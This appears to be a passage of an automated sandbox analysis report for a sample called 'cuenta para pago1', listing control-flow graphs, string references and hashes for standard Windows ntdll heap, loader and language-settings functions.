                                                                                      control_flow_graph 96 34969060-349690a9 97 349690ab-349690b0 96->97 98 349690f8-34969107 96->98 99 349690b4-349690ba 97->99 98->99 100 34969109-3496910e 98->100 101 34969215-3496923d call 34908f40 99->101 102 349690c0-349690e4 call 34908f40 99->102 103 34969893-349698a7 call 34904b50 100->103 112 3496923f-3496925a call 349698aa 101->112 113 3496925c-34969292 101->113 110 349690e6-349690f3 call 349892ab 102->110 111 34969113-349691b4 GetPEB call 3496d7e5 102->111 124 349691fd-34969210 RtlDebugPrintTimes 110->124 122 349691b6-349691c4 111->122 123 349691d2-349691e7 111->123 115 34969294-34969296 112->115 113->115 115->103 120 3496929c-349692b1 RtlDebugPrintTimes 115->120 120->103 130 349692b7-349692be 120->130 122->123 125 349691c6-349691cb 122->125 123->124 126 349691e9-349691ee 123->126 124->103 125->123 128 349691f3-349691f6 126->128 129 349691f0 126->129 128->124 129->128 130->103 132 349692c4-349692df 130->132 133 349692e3-349692f4 call 3496a388 132->133 136 34969891 133->136 137 349692fa-349692fc 133->137 136->103 137->103 138 34969302-34969309 137->138 139 3496930f-34969314 138->139 140 3496947c-34969482 138->140 143 34969316-3496931c 139->143 144 3496933c 139->144 141 3496961c-34969622 140->141 142 34969488-349694b7 call 34908f40 140->142 147 34969674-34969679 141->147 148 34969624-3496962d 141->148 158 349694f0-34969505 142->158 159 349694b9-349694c4 142->159 143->144 149 3496931e-34969332 143->149 145 34969340-34969391 call 34908f40 RtlDebugPrintTimes 144->145 145->103 185 34969397-3496939b 145->185 155 3496967f-34969687 147->155 156 34969728-34969731 147->156 148->133 154 34969633-3496966f call 34908f40 148->154 150 34969334-34969336 149->150 151 34969338-3496933a 149->151 150->145 151->145 179 34969869 154->179 162 34969693-349696bd call 34968093 155->162 163 34969689-3496968d 155->163 156->133 160 34969737-3496973a 156->160 170 34969507-34969509 158->170 171 34969511-34969518 158->171 165 349694c6-349694cd 159->165 166 349694cf-349694ee 159->166 167 34969740-3496978a 160->167 168 349697fd-34969834 call 34908f40 160->168 182 349696c3-3496971e call 34908f40 RtlDebugPrintTimes 162->182 183 34969888-3496988c 162->183 163->156 163->162 165->166 178 34969559-34969576 RtlDebugPrintTimes 166->178 176 34969791-3496979e 167->176 177 3496978c 167->177 196 34969836 168->196 197 3496983b-34969842 168->197 180 3496950f 170->180 181 3496950b-3496950d 170->181 173 3496953d-3496953f 171->173 186 34969541-34969557 173->186 187 3496951a-34969524 173->187 188 349697a0-349697a3 176->188 189 349697aa-349697ad 176->189 177->176 178->103 210 3496957c-3496959f call 34908f40 178->210 190 3496986d 179->190 180->171 181->171 182->103 228 34969724 182->228 183->133 198 3496939d-349693a5 185->198 199 349693eb-34969400 185->199 186->178 193 34969526 187->193 194 3496952d 187->194 188->189 191 349697af-349697b2 189->191 192 349697b9-349697fb 189->192 201 34969871-34969886 RtlDebugPrintTimes 190->201 191->192 192->201 193->186 202 34969528-3496952b 193->202 204 3496952f-34969531 194->204 196->197 205 34969844-3496984b 197->205 206 3496984d 197->206 207 349693a7-349693d0 call 34968093 198->207 208 349693d2-349693e9 198->208 209 34969406-34969414 199->209 201->103 201->183 202->204 214 34969533-34969535 204->214 215 3496953b 204->215 216 34969851-34969857 205->216 206->216 211 34969418-3496946f call 34908f40 RtlDebugPrintTimes 207->211 208->209 209->211 226 349695a1-349695bb 210->226 227 349695bd-349695d8 210->227 211->103 232 34969475-34969477 211->232 214->215 221 34969537-34969539 214->221 215->173 222 3496985e-34969864 216->222 223 34969859-3496985c 216->223 221->173 222->190 229 34969866 222->229 223->179 230 349695dd-3496960b RtlDebugPrintTimes 226->230 227->230 228->156 229->179 230->103 234 34969611-34969617 230->234 232->183 234->160
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $ $0
                                                                                      • API String ID: 3446177414-3352262554
                                                                                      • Opcode ID: 9ccd539a3ffce2d3d54c165ac0240cc63ccd36a5b1e88f6b2049dc43d58a5877
                                                                                      • Instruction ID: 3bd11132369a285f57564954d6d2e83604f67854547a9cc5b7b63fd41764d086
                                                                                      • Opcode Fuzzy Hash: 9ccd539a3ffce2d3d54c165ac0240cc63ccd36a5b1e88f6b2049dc43d58a5877
                                                                                      • Instruction Fuzzy Hash: 8232F4B56083818FE350CF68C884B5AFBE9BF88358F40492EF59A87250D779D949CF52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3496FDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 235 3496fdf4-3496fe16 call 34917be4 238 3496fe35-3496fe4d call 348b7662 235->238 239 3496fe18-3496fe30 RtlDebugPrintTimes 235->239 244 34970277 238->244 245 3496fe53-3496fe69 238->245 243 349702d1-349702e0 239->243 248 3497027a-349702ce call 349702e6 244->248 246 3496fe70-3496fe72 245->246 247 3496fe6b-3496fe6e 245->247 249 3496fe73-3496fe8a 246->249 247->249 248->243 251 34970231-3497023a GetPEB 249->251 252 3496fe90-3496fe93 249->252 254 3497023c-34970257 GetPEB call 348bb910 251->254 255 34970259-3497025e call 348bb910 251->255 252->251 256 3496fe99-3496fea2 252->256 263 34970263-34970274 call 348bb910 254->263 255->263 260 3496fea4-3496febb call 348cfed0 256->260 261 3496febe-3496fed1 call 34970835 256->261 260->261 269 3496fed3-3496feda 261->269 270 3496fedc-3496fef0 call 348b753f 261->270 263->244 269->270 274 3496fef6-3496ff02 GetPEB 270->274 275 34970122-34970127 270->275 276 3496ff04-3496ff07 274->276 277 3496ff70-3496ff7b 274->277 275->248 278 3497012d-34970139 GetPEB 275->278 281 3496ff26-3496ff2b call 348bb910 276->281 282 3496ff09-3496ff24 GetPEB call 348bb910 276->282 279 3496ff81-3496ff88 277->279 280 34970068-3497007a call 348d2710 277->280 283 349701a7-349701b2 278->283 284 3497013b-3497013e 278->284 279->280 285 3496ff8e-3496ff97 279->285 300 34970110-3497011d call 34970d24 call 34970835 280->300 301 34970080-34970087 280->301 298 3496ff30-3496ff51 call 348bb910 GetPEB 281->298 282->298 283->248 286 349701b8-349701c3 283->286 288 34970140-3497015b GetPEB call 348bb910 284->288 289 3497015d-34970162 call 348bb910 284->289 293 3496ffb8-3496ffbc 285->293 294 3496ff99-3496ffa9 285->294 286->248 295 349701c9-349701d4 286->295 308 34970167-3497017b call 348bb910 288->308 289->308 304 3496ffce-3496ffd4 293->304 305 3496ffbe-3496ffcc call 348f3ae9 293->305 294->293 302 3496ffab-3496ffb5 call 3497d646 294->302 295->248 303 349701da-349701e3 GetPEB 295->303 298->280 329 3496ff57-3496ff6b 298->329 300->275 310 34970092-3497009a 301->310 311 34970089-34970090 301->311 302->293 314 349701e5-34970200 GetPEB call 348bb910 303->314 315 34970202-34970207 call 348bb910 303->315 317 3496ffd7-3496ffe0 304->317 305->317 330 3497017e-34970188 GetPEB 308->330 320 3497009c-349700ac 310->320 321 349700b8-349700bc 310->321 311->310 336 3497020c-3497022c call 3496823a call 348bb910 314->336 315->336 327 3496fff2-3496fff5 317->327 328 3496ffe2-3496fff0 317->328 320->321 331 349700ae-349700b3 call 3497d646 320->331 333 349700be-349700d1 call 348f3ae9 321->333 334 349700ec-349700f2 321->334 337 3496fff7-3496fffe 327->337 338 34970065 327->338 328->327 329->280 330->248 341 3497018e-349701a2 330->341 331->321 352 349700e3 333->352 353 349700d3-349700e1 call 348efdb9 333->353 340 349700f5-349700fc 334->340 336->330 337->338 339 34970000-3497000b 337->339 338->280 339->338 345 3497000d-34970016 GetPEB 339->345 340->300 346 349700fe-3497010e 340->346 341->248 350 34970035-3497003a call 348bb910 345->350 351 34970018-34970033 GetPEB call 348bb910 345->351 346->300 360 3497003f-3497005d call 3496823a call 348bb910 350->360 351->360 358 349700e6-349700ea 352->358 353->358 358->340 360->338
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                      • API String ID: 3446177414-1700792311
                                                                                      • Opcode ID: 817bc5fb73dd12257735a904c9d4373e7b098f512d01a837ca9c7b0a7b3bc03e
                                                                                      • Instruction ID: b423fb7cec67a15a7ec0f4b3c6d36eeb8b5cb4171742ad17489c600afef75123
                                                                                      • Opcode Fuzzy Hash: 817bc5fb73dd12257735a904c9d4373e7b098f512d01a837ca9c7b0a7b3bc03e
                                                                                      • Instruction Fuzzy Hash: 44D10E36604685EFEB02CFA8C440AAEBFF6FF49724F058189E895AB752D735D941CB10
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3496F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 926 3496f0a5-3496f0c7 call 34917be4 929 3496f0e3-3496f0fb call 348b7662 926->929 930 3496f0c9-3496f0de RtlDebugPrintTimes 926->930 935 3496f3d2 929->935 936 3496f101-3496f11c 929->936 934 3496f3e7-3496f3f6 930->934 939 3496f3d5-3496f3e4 call 3496f3f9 935->939 937 3496f125-3496f137 936->937 938 3496f11e 936->938 941 3496f13c-3496f144 937->941 942 3496f139-3496f13b 937->942 938->937 939->934 944 3496f350-3496f359 GetPEB 941->944 945 3496f14a-3496f14d 941->945 942->941 946 3496f35b-3496f376 GetPEB call 348bb910 944->946 947 3496f378-3496f37d call 348bb910 944->947 945->944 948 3496f153-3496f156 945->948 954 3496f382-3496f396 call 348bb910 946->954 947->954 951 3496f173-3496f196 call 34970835 call 348d5d90 call 34970d24 948->951 952 3496f158-3496f170 call 348cfed0 948->952 951->939 965 3496f19c-3496f1a3 951->965 952->951 954->935 966 3496f1a5-3496f1ac 965->966 967 3496f1ae-3496f1b6 965->967 966->967 968 3496f1d4-3496f1d8 967->968 969 3496f1b8-3496f1c8 967->969 971 3496f1da-3496f1ed call 348f3ae9 968->971 972 3496f208-3496f20e 968->972 969->968 970 3496f1ca-3496f1cf call 3497d646 969->970 970->968 981 3496f1ff 971->981 982 3496f1ef-3496f1fd call 348efdb9 971->982 973 3496f211-3496f21b 972->973 976 3496f22f-3496f236 973->976 977 3496f21d-3496f22d 973->977 979 3496f241-3496f250 GetPEB 976->979 980 3496f238-3496f23c call 34970835 976->980 977->976 986 3496f252-3496f255 979->986 987 3496f2be-3496f2c9 979->987 980->979 984 3496f202-3496f206 981->984 982->984 984->973 990 3496f257-3496f272 GetPEB call 348bb910 986->990 991 3496f274-3496f279 call 348bb910 986->991 987->939 989 3496f2cf-3496f2d5 987->989 989->939 993 3496f2db-3496f2e2 989->993 995 3496f27e-3496f292 call 348bb910 990->995 991->995 993->939 996 3496f2e8-3496f2f3 993->996 1003 3496f295-3496f29f GetPEB 995->1003 996->939 999 3496f2f9-3496f302 GetPEB 996->999 1001 3496f304-3496f31f GetPEB call 348bb910 999->1001 1002 3496f321-3496f326 call 348bb910 999->1002 1006 3496f32b-3496f34b call 3496823a call 348bb910 1001->1006 1002->1006 1003->939 1007 3496f2a5-3496f2b9 1003->1007 1006->1003 1007->939
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                      • API String ID: 3446177414-1745908468
                                                                                      • Opcode ID: fdc63642ddb2b678060878a146539bdcb9a634df428300a73239685f948fe19a
                                                                                      • Instruction ID: d9e4470eaaecebf209452125a7088d518db2909debb0c43ae29eb63ba676ac26
                                                                                      • Opcode Fuzzy Hash: fdc63642ddb2b678060878a146539bdcb9a634df428300a73239685f948fe19a
                                                                                      • Instruction Fuzzy Hash: A991FF35A04644EFEB02CFACC440A9EBBF6FF493A8F048159E452AB756CB799941CF14
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348B640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1013 348b640d-348b646c call 348b6c11 1016 34919770-34919779 1013->1016 1017 348b6472-348b649e call 348de8a6 call 348b6b45 1013->1017 1019 349197b3-349197b6 1016->1019 1020 3491977b-3491978d 1016->1020 1034 349197e9-349197f2 call 348ee7e0 1017->1034 1035 348b64a4-348b64a6 1017->1035 1021 349197dd 1019->1021 1023 349197a0-349197b0 call 3493e692 1020->1023 1024 349197e3-349197e4 1021->1024 1025 348b6542-348b654a 1021->1025 1023->1019 1024->1025 1029 34919827-3491982b call 348bba80 1025->1029 1030 348b6550-348b6564 call 34904b50 1025->1030 1036 34919830 1029->1036 1039 349197f7-349197fe 1034->1039 1035->1039 1040 348b64ac-348b64d8 call 348f7df6 call 348dd3e1 call 348b6868 1035->1040 1036->1036 1043 34919800 call 3493e692 1039->1043 1044 349197db 1039->1044 1053 34919802-3491980b 1040->1053 1054 348b64de-348b6526 RtlDebugPrintTimes 1040->1054 1043->1044 1044->1021 1053->1019 1055 3491980d 1053->1055 1054->1025 1058 348b6528-348b653c call 348b6565 1054->1058 1055->1023 1058->1025 1061 3491980f-34919822 GetPEB call 348d3bc0 1058->1061 1061->1025
                                                                                      APIs
                                                                                      • RtlDebugPrintTimes.NTDLL ref: 348B651C
                                                                                        • Part of subcall function 348B6565: RtlDebugPrintTimes.NTDLL ref: 348B6614
                                                                                        • Part of subcall function 348B6565: RtlDebugPrintTimes.NTDLL ref: 348B665F
                                                                                      Strings
                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3491977C
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 349197A0, 349197C9
                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 34919790
                                                                                      • apphelp.dll, xrefs: 348B6446
                                                                                      • LdrpInitShimEngine, xrefs: 34919783, 34919796, 349197BF
                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 349197B9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-204845295
                                                                                      • Opcode ID: c2cbf4e52c3e8ffd54acf2a065f92fbd3220f1d6f54f0d6ca0c9145532be7baf
                                                                                      • Instruction ID: 34f367c44a5ae3d63d86897178e94bcecae7ec3aa0c9f63266bb6d832ab7b580
                                                                                      • Opcode Fuzzy Hash: c2cbf4e52c3e8ffd54acf2a065f92fbd3220f1d6f54f0d6ca0c9145532be7baf
                                                                                      • Instruction Fuzzy Hash: A9517C716083089FF720DF24C890A9B7BE9FF84654F404A1DF996A7660DA70D915CF93
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348BD2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                      • API String ID: 0-3532704233
                                                                                      • Opcode ID: d70259bb61f6ff8098a5479688b0ca3a81ac41c84a2b0af3606d60502d45ffa7
                                                                                      • Instruction ID: dd1fadd5fd88c194f21e8a50212fe9c170973d026aefdc81762e19694851766c
                                                                                      • Opcode Fuzzy Hash: d70259bb61f6ff8098a5479688b0ca3a81ac41c84a2b0af3606d60502d45ffa7
                                                                                      • Instruction Fuzzy Hash: 06B15DB6508355EFDB11CF18C440A5FB7E8AB88798F418A2EF899D7341DB70DD488B92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348ED6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlDebugPrintTimes.NTDLL ref: 348ED879
                                                                                        • Part of subcall function 348C4779: RtlDebugPrintTimes.NTDLL ref: 348C4817
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-1975516107
                                                                                      • Opcode ID: 616947b3c1bda64b035c889e181459da147df9df6aaaab0c6a16614b3d0f27f3
                                                                                      • Instruction ID: 58e0a49db57ae897f0012794ed30ce4757b3121ff46764290cbe9991be95ebfd
                                                                                      • Opcode Fuzzy Hash: 616947b3c1bda64b035c889e181459da147df9df6aaaab0c6a16614b3d0f27f3
                                                                                      • Instruction Fuzzy Hash: 8551E275A0834ADFFB14CFA4C8447ADBBF1FF46318F504259D9106B281D7B0A98ACB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348BD02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 348BD202
                                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 348BD136
                                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 348BD0E6
                                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 348BD06F
                                                                                      • @, xrefs: 348BD24F
                                                                                      • @, xrefs: 348BD09D
                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 348BD263
                                                                                      • @, xrefs: 348BD2B3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                      • API String ID: 0-1356375266
                                                                                      • Opcode ID: 59e16336311f989707b88ac54de1d36f32287f577db0dbdf76c720328b23046a
                                                                                      • Instruction ID: 2ee0bd5eef968b3ebd59a84fbe15039a7e8500b1fef1e714e65833856dca19d4
                                                                                      • Opcode Fuzzy Hash: 59e16336311f989707b88ac54de1d36f32287f577db0dbdf76c720328b23046a
                                                                                      • Instruction Fuzzy Hash: 89A12CB1508349EFE721CF14C440B9FB7E8AB84769F408A2EF59996341DB74D908CF92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3496F51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                      • API String ID: 0-2224505338
                                                                                      • Opcode ID: 127589ad314f014d7f64b71bbc9b1d74c6d941042de46d486ed76793eea448dc
                                                                                      • Instruction ID: 25578a5015a280480bd28af5bb261926886ade9804e3a4c1c2938b0e071be414
                                                                                      • Opcode Fuzzy Hash: 127589ad314f014d7f64b71bbc9b1d74c6d941042de46d486ed76793eea448dc
                                                                                      • Instruction Fuzzy Hash: C5514B37202648EFEB16CF9CC884E5A77E9EF08678F108599F4029BB16DA79DD40CE14
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348BF113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-523794902
                                                                                      • Opcode ID: f8d6baa7147518041166a1beaa2d4bfe7a1eab98f72b02c7e0d2bc69f6a1450b
                                                                                      • Instruction ID: fef255ea64330a7e085de8ed0c7f70ceaf191a76026b8507c04c0c2a7b66d545
                                                                                      • Opcode Fuzzy Hash: f8d6baa7147518041166a1beaa2d4bfe7a1eab98f72b02c7e0d2bc69f6a1450b
                                                                                      • Instruction Fuzzy Hash: 5842FD75208385DFEB05CF68C884A2ABBE9FF88244F044A6DE595CB752DB30E945CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348DB0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                      • API String ID: 0-122214566
                                                                                      • Opcode ID: 53863a1bd10cb6b7588fbea3690e92e3c0bf583810b5815640f8b621d5c8a397
                                                                                      • Instruction ID: 46123b98111b68d21533be78cc2a1a7ab4229a6a1f3af29e8e873f6a40a806b3
                                                                                      • Opcode Fuzzy Hash: 53863a1bd10cb6b7588fbea3690e92e3c0bf583810b5815640f8b621d5c8a397
                                                                                      • Instruction Fuzzy Hash: BAC11575A06319AFEB14CF6CC880BBE77A9AF47344F5443ADE811AB294DBB4C844C790
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348F2594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 34931FA9
                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 34931F82
                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 34931FC9
                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 34931F8A
                                                                                      • SXS: %s() passed the empty activation context, xrefs: 34931F6F
                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 34931F6A, 34931FA4, 34931FC4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                      • API String ID: 0-861424205
